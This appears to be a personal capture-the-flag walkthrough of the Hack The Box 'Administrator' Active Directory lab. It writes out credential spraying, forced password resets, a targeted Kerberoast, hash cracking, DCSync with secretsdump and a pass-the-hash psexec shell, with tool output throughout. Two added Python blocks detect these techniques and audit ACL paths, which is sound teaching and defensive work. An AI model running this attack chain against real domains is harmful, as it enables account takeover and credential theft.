Here are my notes on the Administrator box from Hack The Box.
Administrator: 10.129.113.255
#As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account: Olivia / ichliebedich
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
crackmapexec ftp 10.129.113.255 -u Benjamin -p Password123
FTP 10.129.113.255 21 10.129.113.255 [*] Banner: Microsoft FTP Service
FTP 10.129.113.255 21 10.129.113.255 [+] Benjamin:[REDACTED]
#FROM BLOODHOUND DATA ATTACK.
┌──(root㉿kali)-[/home/kali/HTB/ADMIN/FTP]
└─# ftp 10.129.113.255
Connected to 10.129.113.255.
220 Microsoft FTP Service
Name (10.129.113.255:kali): Benjamin
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||52548|)
125 Data connection already open; Transfer starting.
10-05-24 08:13AM 952 Backup.psafe3
226 Transfer complete.
ftp> binary
200 Type set to I.
ftp> passive
Passive mode: off; fallback to active mode: off.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
200 EPRT command successful.
125 Data connection already open; Transfer starting.
100% |**************************************************************************************************************| 952 24.23 KiB/s 00:00 ETA
226 Transfer complete.
952 bytes received in 00:00 (23.48 KiB/s)
ftp> exit
221 Goodbye.
┌──(root㉿kali)-[/home/kali/HTB/ADMIN/FTP]
└─# ls
Backup.psafe3
hashcat -a 0 -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt
Backup.psafe3:[REDACTED]
python2.7 /home/kali/CPTS-EXAM/results/AD/WS01/psafe3-to-keepass-csv/psafe3-to-keepass-csv.py ./Backup.psafe3 ./exported.csv
┌──(root㉿kali)-[/home/kali/HTB/ADMIN/FTP]
└─# cat exported.csv
group,title,username,password,url,notes,modified
,Alexander Smith,alexander,Urk[REDACTED],,,1969-12-31T19:00:00
,Emma Johnson,emma,WwANQW[REDACTED],,,1969-12-31T19:00:00
,Emily Rodriguez,emily,UXL[REDACTED],,,1969-12-31T19:00:00
alexander:UrkIba[REDACTED]
emma:WwANQWnm[REDACTED]
emily:UXLCI5[REDACTED]
┌──(root㉿kali)-[/home/kali/HTB/ADMIN/FTP]
└─# cat users.txt
alexander
emma
emily
┌──(root㉿kali)-[/home/kali/HTB/ADMIN/FTP]
└─# cat pass.txt
UrkIbago[REDACTED]
WwANQ[REDACTED]
UXLCI5[REDACTED]
┌──(root㉿kali)-[/home/kali/HTB/ADMIN/FTP]
└─# crackmapexec smb 10.129.113.255 -u users.txt -p pass.txt --no-bruteforce --continue-on-success
SMB 10.129.113.255 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.113.255 445 DC [-] administrator.htb\alexander:UrkIba[REDACTED] STATUS_LOGON_FAILURE
SMB 10.129.113.255 445 DC [-] administrator.htb\emma:WwANQWnm[REDACTED] STATUS_LOGON_FAILURE
SMB 10.129.113.255 445 DC [+] administrator.htb\emily:UXLCI[REDACTED]
crackmapexec winrm 10.129.113.255 -u users.txt -p pass.txt --no-bruteforce --continue-on-success
SMB 10.129.113.255 5985 DC [*] Windows 10.0 Build 20348 (name:DC) (domain:administrator.htb)
HTTP 10.129.113.255 5985 DC [*] http://10.129.113.255:5985/wsman
WINRM 10.129.113.255 5985 DC [-] administrator.htb\alexander:UrkIbago[REDACTED]
WINRM 10.129.113.255 5985 DC [-] administrator.htb\emma:WwANQWnm[REDACTED]
WINRM 10.129.113.255 5985 DC [+] administrator.htb\emily:UXLCI5iE[REDACTED] (Pwn3d!)
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-29 03:06:38Z)
GetUserSPNs.py -request -dc-ip 10.129.113.255 administrator.htb/Olivia:ichliebedich
/usr/local/bin/GetUserSPNs.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.9.24.dev1+20210704.162046.29ad5792', 'GetUserSPNs.py')
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
No entries found!
#NO Kerberoasting.
#NO Asreproasting.
bloodhound-python -c All -u Olivia -p 'ichliebedich' -d administrator.htb --dns-tcp -ns 10.129.113.255
BloodHound DATA:
Olivia -> GenericAll -> Michael:
net rpc password "Michael" "[REDACTED]" -U "administrator.htb"/"Olivia"%"ichliebedich" -S 10.129.113.255
crackmapexec smb 10.129.113.255 -u Michael -p Password123
SMB 10.129.113.255 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.113.255 445 DC [+] administrator.htb\Michael:[REDACTED]
Michael -> ForceChangePassword -> Benjamin -> Member of -> Share Moderators Group:
net rpc password "Benjamin" "[REDACTED]" -U "administrator.htb"/"Michael"%"[REDACTED]" -S 10.129.113.255
crackmapexec smb 10.129.113.255 -u Benjamin -p [REDACTED]
SMB 10.129.113.255 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.113.255 445 DC [+] administrator.htb\Benjamin:[REDACTED]
Emily -> GenericWrite -> Ethan -> Member of -> Domain Admin Group:
python3 targetedKerberoast.py -v -d 'administrator.htb' -u 'emily' -p '[REDACTED]'
sudo rdate -n 10.129.113.255
. .\PowerView.ps1
$SecPassword = ConvertTo-SecureString 'UXLC[REDACTED]' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('administrator.htb\emily', $SecPassword)
Set-DomainObject -Identity ethan -Set @{serviceprincipalname='nonexistent/BLAHBLAH'}
Get-DomainSPNTicket -Credential $Cred nonexistent/BLAHBLAH
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
[REDACTED] (?)
1g 0:00:00:00 DONE (2024-11-28 16:30) 11.11g/s 56888p/s 56888c/s 56888C/s newzealand..babygrl
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
ethan:[REDACTED]
#Now doing dcsync attacks.
sudo secretsdump.py -just-dc ethan:[REDACTED]@10.129.113.255
/usr/local/bin/secretsdump.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.9.24.dev1+20210704.162046.29ad5792', 'secretsdump.py')
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:[REDACTED]
#Administrator HASH OBTAINED !
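The three moves in this section (a password reset forced on another account with net rpc, a targeted Kerberoast where an SPN is written onto ethan and an RC4 ticket is requested for it, and DCSync with secretsdump) each leave a distinct trace in the Windows Security log on the DC: event 4724 for the reset, event 5136 (servicePrincipalName write, needs object-modification auditing) followed by 4769 with etype 0x17, and event 4662 carrying the replication extended-rights GUIDs. The block below is an added example, not part of the original notes: three small detection rules run over constructed sample events in a flattened key=value form (not real Windows event XML). The helpdesk and replication allow-lists are assumptions a real deployment would fill in from its own environment.

```python
"""Detection rules for the techniques in these notes: forced password reset,
targeted Kerberoast (SPN write then RC4 TGS request) and DCSync.
Added example with constructed events; not code from the original notes."""

# Well-known extended-rights GUIDs for directory replication.
DCSYNC_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Constructed sample events (one per line, fields separated by '|'), modelled
# on the chain in the notes; times are seconds since some epoch.
SAMPLE_EVENTS = """\
id=4724|time=1|subject=olivia|target=michael
id=4724|time=2|subject=michael|target=benjamin
id=4724|time=3|subject=helpdesk01|target=emma
id=5136|time=4|subject=emily|object=CN=Ethan Hunt,CN=Users,DC=administrator,DC=htb|attr=servicePrincipalName|value=nonexistent/BLAHBLAH
id=4769|time=5|subject=emily|spn=nonexistent/BLAHBLAH|etype=0x17
id=4769|time=6|subject=svc_web|spn=HTTP/web.administrator.htb|etype=0x12
id=4662|time=7|subject=ethan|host=DC$|props=1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
id=4662|time=8|subject=DC$|host=DC$|props=1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
"""

ALLOWED_RESETTERS = {"helpdesk01"}   # assumed: accounts allowed to reset others' passwords
REPLICATION_ACCOUNTS = {"DC$"}       # assumed: DC machine accounts, sync connectors, etc.


def parse_events(text):
    """Turn the flattened sample format into a list of dicts."""
    events = []
    for line in text.strip().splitlines():
        ev = dict(field.split("=", 1) for field in line.split("|"))
        ev["time"] = int(ev["time"])
        events.append(ev)
    return events


def detect_forced_resets(events):
    """4724: someone outside the helpdesk allow-list reset another account's password."""
    return [(e["subject"], e["target"]) for e in events
            if e["id"] == "4724" and e["subject"] != e["target"]
            and e["subject"] not in ALLOWED_RESETTERS]


def detect_targeted_kerberoast(events, window=300):
    """5136 writing servicePrincipalName, followed within `window` seconds by a
    4769 for that same SPN using RC4 (etype 0x17)."""
    spn_writes = {e["value"]: e for e in events
                  if e["id"] == "5136" and e["attr"] == "servicePrincipalName"}
    hits = []
    for e in events:
        if e["id"] == "4769" and e["etype"] == "0x17" and e["spn"] in spn_writes:
            w = spn_writes[e["spn"]]
            if 0 <= e["time"] - w["time"] <= window:
                hits.append((w["subject"], w["object"], e["spn"]))
    return hits


def detect_dcsync(events):
    """4662 whose Properties contain replication GUIDs, from anything that is
    not a known replication account."""
    hits = []
    for e in events:
        if e["id"] != "4662" or e["subject"] in REPLICATION_ACCOUNTS:
            continue
        rights = [DCSYNC_GUIDS[g] for g in e["props"].split(";") if g in DCSYNC_GUIDS]
        if rights:
            hits.append((e["subject"], tuple(rights)))
    return hits


def run_all(text=SAMPLE_EVENTS):
    """Run every rule and return the hits keyed by rule name."""
    ev = parse_events(text)
    return {"forced_reset": detect_forced_resets(ev),
            "targeted_kerberoast": detect_targeted_kerberoast(ev),
            "dcsync": detect_dcsync(ev)}


if __name__ == "__main__":
    for rule, hits in run_all().items():
        print(rule, hits)
```

The Kerberoast rule keys on the SPN value rather than on the account, because the SPN written by the attacker is arbitrary but it has to appear verbatim in the later 4769; a dedicated helpdesk allow-list and a replication allow-list keep the other two rules from firing on legitimate activity.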
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
ldapsearch -H ldap://10.129.113.255 -x -W -D "Olivia@administrator.htb" -b "dc=administrator,dc=htb" '(objectClass=person)' > ldap-people
Olivia is remote-management user.
445/tcp open microsoft-ds?
┌──(root㉿kali)-[/home/kali/HTB/10.129.113.255]
└─# smbclient -N -L 10.129.113.255 -U "Guest"
session setup failed: NT_STATUS_LOGON_FAILURE
┌──(root㉿kali)-[/home/kali/HTB/10.129.113.255]
└─# smbclient -N -L 10.129.113.255 -U ""
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.113.255 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
#NO SYSVOL xml or gpp scripts = DON'T BOTHER !
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
crackmapexec winrm 10.129.113.255 -u Olivia -p 'ichliebedich'
SMB 10.129.113.255 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
HTTP 10.129.113.255 5985 DC [*] http://10.129.113.255:5985/wsman
WINRM 10.129.113.255 5985 DC [+] administrator.htb\Olivia:ichliebedich (Pwn3d!)
evil-winrm -i 10.129.113.255 -u Olivia -p 'ichliebedich'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\olivia\Documents> whoami
administrator\olivia
*Evil-WinRM* PS C:\Users\olivia\Documents> hostname
dc
OLIVIA SHELL ! but no flag though.
adPEAS:
[*] +++++ Checking DCSync Rights +++++
[*] https://book.hacktricks.xyz/windows/active-directory-methodology/dcsync
Checking DCSync Rights – Details for Domain ‘administrator.htb’:
ActiveDirectoryRight : DS-Replication-Get-Changes
Identity : ADMINISTRATOR\ethan
distinguishedName : CN=Ethan Hunt,CN=Users,DC=administrator,DC=htb
ObjectSID : S-1-5-21-1088858960-373806567-254189436-1113
ActiveDirectoryRight : DS-Replication-Get-Changes-In-Filtered-Set
Identity : ADMINISTRATOR\ethan
distinguishedName : CN=Ethan Hunt,CN=Users,DC=administrator,DC=htb
ObjectSID : S-1-5-21-1088858960-373806567-254189436-1113
ActiveDirectoryRight : DS-Replication-Get-Changes-All
Identity : ADMINISTRATOR\ethan
distinguishedName : CN=Ethan Hunt,CN=Users,DC=administrator,DC=htb
ObjectSID : S-1-5-21-1088858960-373806567-254189436-1113
#ethan is a very interesting man or woman.
Import-Module .\PowerView.ps1
$sid = Convert-NameToSid Benjamin
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}
Get-NetUser -Identity benjamin -domain administrator.htb
Get-ObjectAcl -Domain administrator.htb | Where-Object {$_.SecurityIdentifier -eq 'S-1-5-21-1088858960-373806567-254189436-1110'}
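What BloodHound showed earlier (Olivia -> GenericAll -> Michael -> ForceChangePassword -> Benjamin, Emily -> GenericWrite -> Ethan -> Domain Admins, Ethan holding the replication rights adPEAS lists) and what the PowerView queries above pull per SID is the same thing viewed from two sides: ACEs that hand one principal control over another. The block below is an added example, not from the original notes or from BloodHound/PowerView: a small ACL audit that takes a constructed ACE export and group membership list (the relationships from these notes) and reports every non-privileged principal with a path to a high-value group or to DCSync-equivalent rights, which is the list a defender would remove or justify. Right names and the high-value group names are assumptions matching the page's terminology.

```python
"""ACE path audit over a constructed export of the relationships in these notes.
Added example; not code from the original notes or from BloodHound/PowerView."""

# Rights on a user/group object that let the holder take it over.
TAKEOVER_RIGHTS = {"GenericAll", "GenericWrite", "WriteDacl", "WriteOwner",
                   "ForceChangePassword", "AddMember", "WriteProperty"}
# Extended rights on the domain head that amount to DCSync.
REPLICATION_RIGHTS = {"DS-Replication-Get-Changes", "DS-Replication-Get-Changes-All"}
HIGH_VALUE = {"Domain Admins", "Enterprise Admins", "Administrators"}

# Constructed ACE export as (holder, right, target).
ACES = [
    ("Olivia", "GenericAll", "Michael"),
    ("Michael", "ForceChangePassword", "Benjamin"),
    ("Emily", "GenericWrite", "Ethan"),
    ("Ethan", "DS-Replication-Get-Changes", "administrator.htb"),
    ("Ethan", "DS-Replication-Get-Changes-All", "administrator.htb"),
    ("Share Moderators", "ReadProperty", "Ethan"),   # harmless right; must not be flagged
]
# Constructed group memberships: member -> groups.
MEMBER_OF = {
    "Benjamin": {"Share Moderators"},
    "Ethan": {"Domain Admins"},
    "Olivia": {"Remote Management Users"},
}


def build_edges(aces, member_of):
    """Directed graph: holder -> target for takeover rights, member -> group for
    memberships, and holder -> the synthetic node 'DCSync' for replication rights."""
    edges = {}
    for holder, right, target in aces:
        if right in TAKEOVER_RIGHTS:
            edges.setdefault(holder, set()).add((target, right))
        elif right in REPLICATION_RIGHTS:
            edges.setdefault(holder, set()).add(("DCSync", right))
    for member, groups in member_of.items():
        for g in groups:
            edges.setdefault(member, set()).add((g, "MemberOf"))
    return edges


def find_paths(edges, start, goals, max_depth=8):
    """Depth-first search from start; returns every simple path ending on a goal."""
    paths = []

    def walk(node, path, seen):
        if len(path) > max_depth:
            return
        for nxt, right in edges.get(node, ()):
            if nxt in seen:
                continue
            new_path = path + [(right, nxt)]
            if nxt in goals:
                paths.append(new_path)
            walk(nxt, new_path, seen | {nxt})

    walk(start, [], {start})
    return paths


def audit(aces=ACES, member_of=MEMBER_OF):
    """Return {principal: [path, ...]} for each non-privileged principal that can
    reach a high-value group or DCSync rights through the ACE/membership graph."""
    edges = build_edges(aces, member_of)
    goals = HIGH_VALUE | {"DCSync"}
    findings = {}
    for principal in sorted(edges):
        if principal in HIGH_VALUE:
            continue
        paths = find_paths(edges, principal, goals)
        if paths:
            findings[principal] = paths
    return findings


def format_path(start, path):
    """Render a path in the 'A -Right-> B' style BloodHound users are used to."""
    return start + "".join(f" -{r}-> {n}" for r, n in path)


if __name__ == "__main__":
    for principal, paths in audit().items():
        for path in paths:
            print(format_path(principal, path))
```

On this data Olivia, Michael and Benjamin are not reported, because their chain ends at Share Moderators, which is not a high-value group; Emily and Ethan are, because Ethan is both a Domain Admin and a DCSync holder. In a real environment the ACE list would come from Get-DomainObjectACL -ResolveGUIDs or a BloodHound export, and the HIGH_VALUE set would include any tiered admin groups the organisation defines.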
olivia -> emily:
#FROM BLOODHOUND DATA ATTACK and FTP.
crackmapexec winrm 10.129.113.255 -u users.txt -p pass.txt --no-bruteforce --continue-on-success
SMB 10.129.113.255 5985 DC [*] Windows 10.0 Build 20348 (name:DC) (domain:administrator.htb)
HTTP 10.129.113.255 5985 DC [*] http://10.129.113.255:5985/wsman
…
WINRM 10.129.113.255 5985 DC [+] administrator.htb\emily:UXLC[REDACTED] (Pwn3d!)
evil-winrm -i 10.129.113.255 -u emily -p 'UXLC[REDACTED]'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily\Documents> whoami
administrator\emily
*Evil-WinRM* PS C:\Users\emily\Documents> hostname
dc
EMILY SHELL !
*Evil-WinRM* PS C:\Users\emily\Desktop> whoami
administrator\emily
*Evil-WinRM* PS C:\Users\emily\Desktop> hostname
dc
*Evil-WinRM* PS C:\Users\emily\Desktop> dir
Directory: C:\Users\emily\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a—- 10/30/2024 2:23 PM 2308 Microsoft Edge.lnk
-ar— 11/28/2024 6:58 PM 34 user.txt
*Evil-WinRM* PS C:\Users\emily\Desktop> type user.txt
[REDACTED]
USER.TXT: [REDACTED]
PRIV ESC:
#FROM BLOODHOUND DATA ATTACK: emily -> ethan (targeted Kerberoast above), then DCSync as ethan gives the Administrator NT hash.
psexec.py -hashes :3dc5[REDACTED] Administrator@10.129.113.255
/usr/local/bin/psexec.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.9.24.dev1+20210704.162046.29ad5792', 'psexec.py')
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.129.113.255…..
[*] Found writable share ADMIN$
[*] Uploading file ZJjIDGDF.exe
[*] Opening SVCManager on 10.129.113.255…..
[*] Creating service IOOe on 10.129.113.255…..
[*] Starting service IOOe…..
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.2762]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>hostname
dc
SYSTEM-SHELL !
C:\Users\Administrator\Desktop>whoami
nt authority\system
C:\Users\Administrator\Desktop>hostname
dc
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 6131-DE70
Directory of C:\Users\Administrator\Desktop
11/01/2024 01:47 PM <DIR> .
10/22/2024 10:46 AM <DIR> ..
11/28/2024 06:58 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 5,385,117,696 bytes free
C:\Users\Administrator\Desktop>type root.txt
[REDACTED]
ROOT.TXT: [REDACTED]
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
51449/tcp open msrpc Microsoft Windows RPC
64285/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
64290/tcp open msrpc Microsoft Windows RPC
64301/tcp open msrpc Microsoft Windows RPC
64315/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Thank you for reading my notes!